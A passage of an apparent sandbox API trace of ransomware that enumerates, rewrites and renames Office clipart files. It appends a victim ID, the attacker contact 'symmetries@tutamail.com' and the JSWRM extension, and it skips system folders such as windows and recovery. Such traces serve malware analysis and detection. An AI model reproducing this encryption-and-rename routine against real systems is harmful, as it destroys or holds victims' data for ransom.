returned 0x23da70 [0074.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0074.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0074.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.841] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0074.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.842] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00098_.WMF", cAlternateFileName="")) returned 1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2=".") returned 1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="..") returned 1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="...") returned 1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="windows") returned -1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="recovery") returned -1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="perflogs") returned -1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="documents and settings") returned -1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="system volume information") returned -1 [0074.842] lstrcmpiW (lpString1="BL00098_.WMF", lpString2="msocache") returned -1 [0074.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00098_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00098_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00098_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00098_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00098_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00098_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.843] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1012) returned 1 [0074.843] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3f0) returned 0x203550 [0074.843] ReadFile (in: hFile=0x460, lpBuffer=0x203550, nNumberOfBytesToRead=0x3f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x3f0, lpOverlapped=0x0) returned 1 [0074.844] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.844] WriteFile (in: hFile=0x460, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x3f0, lpOverlapped=0x0) returned 1 [0074.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0074.844] CloseHandle (hObject=0x460) returned 1 [0074.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0074.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0074.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0074.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0074.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.845] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.846] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x370, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00105_.WMF", cAlternateFileName="")) returned 1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2=".") returned 1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="..") returned 1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="...") returned 1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="windows") returned -1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="recovery") returned -1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="perflogs") returned -1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="documents and settings") returned -1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="system volume information") returned -1 [0074.846] lstrcmpiW (lpString1="BL00105_.WMF", lpString2="msocache") returned -1 [0074.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0074.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00105_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00105_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00105_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0074.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0074.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00105_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00105_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00105_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0074.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.846] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=880) returned 1 [0074.847] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0074.847] ReadFile (in: hFile=0x460, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x370, lpOverlapped=0x0) returned 1 [0074.848] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.848] WriteFile (in: hFile=0x460, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x370, lpOverlapped=0x0) returned 1 [0074.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0074.848] CloseHandle (hObject=0x460) returned 1 [0074.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0074.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0074.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0074.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0074.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0074.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.849] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0074.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.850] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27a2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00122_.WMF", cAlternateFileName="")) returned 1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2=".") returned 1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="..") returned 1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="...") returned 1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="windows") returned -1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="recovery") returned -1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="perflogs") returned -1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="documents and settings") returned -1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="system volume information") returned -1 [0074.850] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="msocache") returned -1 [0074.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0074.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00122_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00122_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00122_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0074.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0074.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00122_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00122_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00122_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0074.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.851] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10146) returned 1 [0074.851] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27a0) returned 0x24c1d0 [0074.851] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27a0, lpOverlapped=0x0) returned 1 [0074.852] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.853] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27a0, lpOverlapped=0x0) returned 1 [0074.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.853] CloseHandle (hObject=0x460) returned 1 [0074.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0074.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0074.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0074.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0074.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0074.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0074.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.854] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00130_.WMF", cAlternateFileName="")) returned 1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2=".") returned 1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="..") returned 1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="...") returned 1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="windows") returned -1 [0074.854] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="recovery") returned -1 [0074.854] 